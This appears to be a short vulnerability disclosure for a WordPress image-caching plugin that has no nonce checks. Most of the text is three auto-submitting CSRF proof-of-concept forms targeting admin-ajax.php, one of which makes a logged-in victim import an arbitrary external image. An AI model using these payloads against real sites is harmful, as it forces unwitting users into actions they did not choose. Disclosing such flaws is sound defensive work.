The plugin does not implement nonce checks, which could allow attackers to make any logged user upload images via a CSRF attack.
Allows import of any images with any user level.
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="getlist">
<input type="text" name="domain" value="example.com">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="getdomains">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="regen">
<input type="text" name="url" value="https://heise.cloudimg.io/v7/_www-heise-de_/imgs/18/3/4/8/4/2/6/8/shutterstock_1124819546_jpg.jpg-d3889c815ce30778.jpeg?org_if_sml=1&q=30&width=1032">
<input type="text" name="postid" value="2">
</form>
<script>
document.getElementById("test").submit();
</script>